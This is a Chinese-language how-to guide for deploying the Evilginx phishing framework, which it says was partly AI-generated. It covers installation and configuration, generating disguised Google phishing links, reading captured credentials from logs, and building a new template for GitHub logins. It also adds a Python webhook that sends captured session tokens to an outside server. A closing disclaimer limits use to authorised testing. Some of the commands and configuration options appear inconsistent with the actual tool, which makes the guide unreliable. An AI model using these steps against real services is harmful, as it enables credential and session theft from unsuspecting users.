Evilginx实战指南:从环境搭建到高级配置
【免费下载链接】evilginxPLEASE USE NEW VERSION: https://github.com/kgretzky/evilginx2项目地址: https://gitcode.com/gh_mirrors/ev/evilginx
一、准备阶段:从零开始的环境配置
1.1 系统环境检查与依赖安装
问题:如何确认系统是否满足 Evilginx 运行要求?
方案:通过以下命令检查关键依赖项:
# 检查 Python 版本(需 3.6+) python3 --version # 检查 OpenSSL 版本(需 1.1.1+) openssl version # 安装必要系统依赖 sudo apt update && sudo apt install -y python3-pip libssl-dev #重点:安装Python包管理器和SSL开发库| 命令 | 作用 | 可选参数 |
|---|---|---|
python3 --version | 验证Python环境 | -V(简洁输出) |
openssl version | 检查SSL支持 | -a(显示全部信息) |
1.2 项目获取与目录结构解析
问题:如何正确获取源码并理解目录布局?
方案:通过 Git 克隆仓库并分析核心目录:
# 克隆项目代码 git clone https://gitcode.com/gh_mirrors/ev/evilginx # 查看关键目录结构 tree -L 2 evilginx/核心目录说明:
- sites/:包含各目标网站的配置模板(如
google/、facebook/) - evilginx.py:主程序入口文件
- install.sh:环境安装脚本
提示:
sites/目录中的.conf文件定义了不同网站的钓鱼配置模板,是自定义攻击场景的关键。
二、配置阶段:场景化配置方案
2.1 基础配置文件生成
问题:首次运行提示配置文件缺失?
方案:使用 setup 命令生成基础配置:
# 生成默认配置文件 python3 evilginx.py setup --output ./config/evilginx.ini #重点:指定配置文件输出路径 # 配置文件结构示例(evilginx.ini) [server] http_port = 8080 # HTTP服务端口 https_port = 8443 # HTTPS服务端口 log_dir = ./logs/ # 日志存储目录 [phishing] target = google # 默认目标网站 ssl_verify = false # 生产环境建议设为true2.2 生产环境配置优化
问题:默认配置在高并发下性能不足?
方案:对比优化关键参数:
| 配置项 | 默认值 | 生产环境建议 | 优化说明 |
|---|---|---|---|
worker_processes | 1 | 4 | 根据CPU核心数调整 |
max_connections | 1024 | 4096 | 提高并发处理能力 |
log_level | debug | info | 减少日志IO开销 |
# 生产环境优化配置片段 [performance] worker_processes = 4 max_connections = 4096 buffer_size = 16k⚠️注意:修改配置后需重启服务才能生效,生产环境建议先在测试环境验证配置。
三、操作阶段:核心功能实战
3.1 启动与状态管理
问题:如何正确启停服务并监控运行状态?
方案:使用自定义命令集管理服务生命周期:
# 启动服务(后台运行模式) python3 evilginx.py start --daemon --config ./config/evilginx.ini # 查看实时状态 python3 evilginx.py status # 优雅停止服务 python3 evilginx.py stop --timeout 30| 命令 | 作用 | 可选参数 |
|---|---|---|
start | 启动服务 | --daemon(后台运行)、--debug(调试模式) |
status | 查看状态 | --detail(显示详细信息) |
stop | 停止服务 | --timeout(等待超时秒数) |
3.2 钓鱼链接生成与管理
问题:如何为不同目标生成定制钓鱼链接?
方案:使用 genurl 命令创建场景化链接:
# 生成Google钓鱼链接(带伪装参数) python3 evilginx.py genurl --site google --template login --redirect https://example.com #重点:指定模板和重定向地址 # 输出示例: # 钓鱼链接: http://yourdomain.com/g-login?token=abc123 # 管理ID: g1x9z23.3 数据捕获与分析
问题:如何查看捕获的凭证数据?
方案:解析日志文件获取结构化数据:
# 查看最近捕获的凭证 cat ./logs/captures.log | jq '.[] | {email: .email, timestamp: .time}' # 输出示例: # { # "email": "user@example.com", # "timestamp": "2026-01-26T10:30:15Z" # }四、扩展阶段:功能定制与高级应用
4.1 自定义网站模板开发
问题:如何添加新的目标网站配置?
方案:创建自定义网站配置目录:
# 复制基础模板 cp -r sites/google/ sites/github/ # 修改配置文件(github/config) [general] name = GitHub domain = github.com login_path = /login [captures] username_field = login password_field = password4.2 API接口开发集成
问题:如何将捕获数据实时推送到外部系统?
方案:修改dump_tokens函数添加Webhook:
def dump_tokens(setcookies, tokens, token_domains): # 原有代码... # 添加Webhook推送 import requests requests.post( "https://your-server.com/webhook", json={"tokens": tokens, "timestamp": time.time()} ) #重点:实时推送捕获数据五、排障指南:常见问题解决方案
5.1 配置文件解析错误
错误现象:启动时报ConfigParseError: Invalid section
解决流程:
- 检查配置文件是否存在语法错误(如括号不匹配)
- 验证section名称是否正确(区分大小写)
- 使用
--validate-config参数检测配置完整性:python3 evilginx.py validate --config ./config/evilginx.ini
5.2 SSL证书加载失败
错误现象:SSL: CERTIFICATE_VERIFY_FAILED
解决流程:
- 确认证书文件路径是否正确
- 检查证书格式是否为PEM格式
- 生产环境建议使用Let's Encrypt证书:
certbot certonly --standalone -d yourdomain.com
5.3 端口占用冲突
错误现象:Address already in use: bind
解决流程:
- 查找占用进程:
sudo lsof -i :8443 - 终止冲突进程:
sudo kill -9 <PID> - 修改配置文件中的端口号
六、合法使用声明
⚠️重要法律声明
本工具仅用于合法授权的渗透测试和安全研究。未经授权使用 Evilginx 对他人系统进行攻击属于违法行为,可能导致刑事处罚。使用前必须:
- 获得目标系统的书面授权
- 严格遵守当地法律法规
- 仅在测试环境中使用,禁止用于生产系统
安全技术的价值在于防御而非攻击。请始终以保护系统安全为出发点使用本工具。
【免费下载链接】evilginxPLEASE USE NEW VERSION: https://github.com/kgretzky/evilginx2项目地址: https://gitcode.com/gh_mirrors/ev/evilginx
创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
